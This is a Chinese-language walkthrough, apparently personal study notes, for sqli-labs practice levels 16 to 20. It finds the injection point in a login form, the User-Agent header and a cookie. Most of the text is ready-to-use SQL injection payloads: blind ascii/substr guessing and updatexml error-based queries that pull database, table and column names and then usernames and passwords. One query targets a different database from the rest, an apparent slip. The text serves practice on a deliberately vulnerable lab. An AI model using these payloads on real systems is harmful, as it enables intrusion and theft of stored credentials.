一.less-16

1.寻找注入点

发现url无法回显

构造闭合无论' 还是 "都没有任何反应

最后发现闭合符号为")时成功登录

没有回显使用盲注

2.爆数据库

12") or (length(database()))=8#

爆出数据库长度

获取数据库名，第一个字母的ascii码值

12") or ascii(substr(database(),1,1))=115#

根据ascii值得出数据库第一个字母为s

最后得出数据库为security

3.爆表查看security的所有表

12 ") or (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101#

4.爆列

12 ") or (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))=105#

5.爆数据

12") or ascii(substr((select username from users limit 0,1),1,1))=68#

12") or ascii(substr((select password from users limit 0,1),1,1))=68#

二.less-17

1.寻找闭合点

这是密码重置页面，账号不管输入' 还是 "都无法闭合

账号admin密码任意输入加'即可报错

闭合方式为单引号，后面拼接报错注入方式可以查出结果

12' and updatexml(1,concat(0x7e,substr((select version()),1,31),0x7e),1)#

2.爆库

12' and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)#

3.爆表

12' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#

4.爆列

12' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,31),0x7e),1)#

5.爆数据

12' and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from pikachu.users),1,31),0x7e),1)#

三.less-18

1.寻找注入点

成功登录会显示user-agent信息，注入点在user-agent

2.爆库

提交方式是post，注入方式是ua头，报错注入可以成功

and' or updatexml(1,concat(0x7e,substr(version(),1,31),0x7e),1) and '1'='#

3.爆表

a' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1) and '1'='#

4.爆列

a' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,31),0x7e),1) and '1'='#

5.爆数据

a' or updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),1,31),0x7e),1) and '1'='#

四.less-19

登录成功后发现注入点与上关不同

a' or updatexml(1,concat(0x7e,substr(version(),1,31),0x7e),1) and '1'='#

发现注入代码与上关也一样然后就是与上关一样的操作只是注入点不一样就可以了

五.less-20

1.寻找注入点

成功登录会显示user-agent信息和cookie信息，注入点在cookie

抓个包看cookie值

在admin后面添加一个单引号，出现了sql语句的报错

寻找闭合符号

拼接逻辑语句，判断闭合符号是否正确

闭合符号为单引号，逻辑语句正常，1=1时正常显示，1=2时，出现错误

uname=admin' and 1=1#;BEEFHOOK=dZVE2ik7R0liCsQfV7YllV89rzZglaxxEjqccbKOb7KxynsbZTYoiSVfNMwQWGGeOY5ne8wQwHdInD3D;PHPSESSID=djer5384u6itlu0bf88pct2165
 

uname=admin' and 1=2#;BEEFHOOK=dZVE2ik7R0liCsQfV7YllV89rzZglaxxEjqccbKOb7KxynsbZTYoiSVfNMwQWGGeOY5ne8wQwHdInD3D;PHPSESSID=djer5384u6itlu0bf88pct2165

拼接报错语句，查看数据库版本成功

uname=admin' and updatexml(1,concat(0x7e,substr(version(),1,31),0x7e),1)#;BEEFHOOK=dZVE2ik7R0liCsQfV7YllV89rzZglaxxEjqccbKOb7KxynsbZTYoiSVfNMwQWGGeOY5ne8wQwHdInD3D;PHPSESSID=djer5384u6itlu0bf88pct2165

2.爆库

uname=admin' and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)#;BEEFHOOK=dZVE2ik7R0liCsQfV7YllV89rzZglaxxEjqccbKOb7KxynsbZTYoiSVfNMwQWGGeOY5ne8wQwHdInD3D;PHPSESSID=djer5384u6itlu0bf88pct2165

3.爆表

uname=admin' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#;BEEFHOOK=dZVE2ik7R0liCsQfV7YllV89rzZglaxxEjqccbKOb7KxynsbZTYoiSVfNMwQWGGeOY5ne8wQwHdInD3D;PHPSESSID=djer5384u6itlu0bf88pct2165

4.爆列

uname=admin' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,31),0x7e),1)#;BEEFHOOK=dZVE2ik7R0liCsQfV7YllV89rzZglaxxEjqccbKOb7KxynsbZTYoiSVfNMwQWGGeOY5ne8wQwHdInD3D;PHPSESSID=djer5384u6itlu0bf88pct2165

5.爆数据

uname=admin' and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),1,31),0x7e),1)#;BEEFHOOK=dZVE2ik7R0liCsQfV7YllV89rzZglaxxEjqccbKOb7KxynsbZTYoiSVfNMwQWGGeOY5ne8wQwHdInD3D;PHPSESSID=djer5384u6itlu0bf88pct2165